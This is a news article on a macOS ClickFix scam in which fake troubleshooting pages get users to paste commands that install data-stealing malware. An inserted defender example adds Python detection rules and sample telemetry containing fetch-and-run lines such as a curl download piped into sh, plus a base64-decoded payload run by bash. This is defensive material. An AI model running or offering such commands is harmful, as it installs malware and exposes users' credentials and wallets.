HackRead

Fake macOS Troubleshooting Sites Used to Steal iCloud Data in ClickFix Scam


The Microsoft Defender Security Research Team has identified a new campaign designed to gain unauthorised access to Apple computers with a social engineering trick called ClickFix. The method has become a favourite of scammers lately; Hackread.com has been tracking the rising trend of these attacks.

The new research from Microsoft adds to these observations, showing how the technique is being used to evade traditional security and steal high-value data from unsuspecting users.

The trap of fake troubleshooting

This campaign starts by tricking people who are looking for help with their MacBooks. According to Microsoft’s research, since late 2025 and throughout early 2026, scammers have been luring people with fake troubleshooting guides on sites like Medium, Craft, and Squarespace, which promise to fix a common problem, like freeing up disk space or fixing a system error.

Instead of offering a download, the sites offer a command, claiming it is a system utility or a quick fix, and the user has to copy and paste the code into their Mac’s Terminal. “Some sites present this information in multiple languages. As of this writing, these websites that we’ve observed are either already down or have been reported,” researchers noted in the blog post.

Fake troubleshooting guides (Source: Microsoft)

As soon as the command is run, your Mac secretly downloads malware like AMOS (Atomic macOS Stealer), Macsync, or SHub Stealer. And, since you ran the command yourself, the Mac’s normal security checks, such as Gatekeeper, are skipped.

Gatekeeper normally inspects only downloaded app bundles and disk images, so a command the user types directly into Terminal is never checked. The malware then shows a fake box asking for a system password to install a helper tool. If the password is provided, the hackers gain full access to files and settings.

What the hackers are after

The objective behind these scams is to obtain as much private information as possible. In this particular campaign, the malware specifically targets:

  •  Information from your iCloud and Telegram accounts.
  •  Private documents, notes, and photos smaller than 2 MB.
  •  Private crypto wallet keys, including Exodus, Ledger, and Trezor.
  •  Saved passwords and login data from browsers like Chrome and Firefox.

Microsoft reports that in some cases, attackers even deleted the user’s authentic crypto apps and replaced them with fake, trojanized versions, mainly to monitor transactions and steal funds. Hackers are also reportedly using curl, osascript, and similar tools to run the attack directly in the Mac’s memory. This fileless method makes detection very difficult for standard antivirus software. Microsoft’s team also discovered a kill switch that stops the malware if it detects a Russian keyboard.
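A defender’s view of the pattern just described, as an added example that is not from Microsoft’s report or from HackRead: a small rule set run over constructed macOS process events that flags a download piped straight into a shell or osascript, an osascript password-style dialog, and a base64-decoded payload handed to a shell, noting when the parent is the user’s own Terminal. The event shape, the rules, the parent-process names and the sample lines are all assumptions for illustration.

```python
"""Toy ClickFix detection over constructed macOS process events (not Microsoft's logic).
Assumed event shape: {'id', 'parent', 'cmd'} where 'cmd' is the full command line.
Sample events below are constructed; hosts are placeholders, not indicators.
"""
import re
from typing import Dict, List

# Interpreters a pasted one-liner would hand a downloaded payload to.
INTERPRETERS = r"(?:sh|bash|zsh|osascript|python3?)"

RULES = {
    # curl/wget output piped straight into a shell or osascript: runs in memory, no file for AV.
    "pipe_to_interpreter": re.compile(
        rf"\b(?:curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?{INTERPRETERS}\b"),
    # osascript building a password-style dialog: the fake "helper tool" prompt.
    "osascript_password_prompt": re.compile(
        r"\bosascript\b.*display dialog.*(?:hidden answer|default answer)", re.I),
    # base64-decoded payload handed to a shell, a common way to hide the pasted command.
    "base64_decode_to_shell": re.compile(
        rf"\bbase64\s+(?:-d|--decode|-D)\b[^|]*\|\s*{INTERPRETERS}\b"),
}

# Parent processes that mean the user typed or pasted the command themselves (assumed names).
TERMINAL_PARENTS = {"Terminal", "iTerm2"}

def classify(event: Dict[str, object]) -> List[str]:
    """Return the names of every rule that fires on one process event."""
    hits = [name for name, rx in RULES.items() if rx.search(str(event["cmd"]))]
    # A ClickFix command runs from the user's own terminal; note that on top of any hit.
    if hits and event.get("parent") in TERMINAL_PARENTS:
        hits.append("user_terminal_origin")
    return hits

def scan(events: List[Dict[str, object]]) -> Dict[object, List[str]]:
    """Map event id -> rule hits for a batch of events."""
    return {e["id"]: classify(e) for e in events}

SAMPLE_EVENTS = [  # constructed sample telemetry
    {"id": 1, "parent": "Terminal", "cmd": "curl -fsSL https://placeholder.invalid/fix | sh"},
    {"id": 2, "parent": "Terminal", "cmd": "osascript -e 'display dialog ... with hidden answer'"},
    {"id": 3, "parent": "launchd", "cmd": "curl -sS https://placeholder.invalid/api -o /tmp/o.json"},
    {"id": 4, "parent": "Terminal", "cmd": "echo ZWNobyBoaQ== | base64 -d | bash"},
    {"id": 5, "parent": "Terminal", "cmd": "diskutil list"},
]

if __name__ == "__main__":
    for eid, hits in scan(SAMPLE_EVENTS).items():
        print(eid, hits or "clean")
```

Event 3 (a plain download to a file from a non-terminal parent) and event 5 stay clean, which is the point: the rules key on the pipe-to-interpreter shape and the password dialog, not on curl or osascript alone.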

How to Stay Safe

Apple has addressed this problem by adding a safety feature in macOS 26.4 that shows a warning, “Possible malware, Paste blocked”, whenever you paste a suspicious command into Terminal.

As an additional precaution, researchers suggest never copy-pasting commands from any blog or website without verifying the source, and trusting only official updates and guides from Apple to fix issues on your Mac.
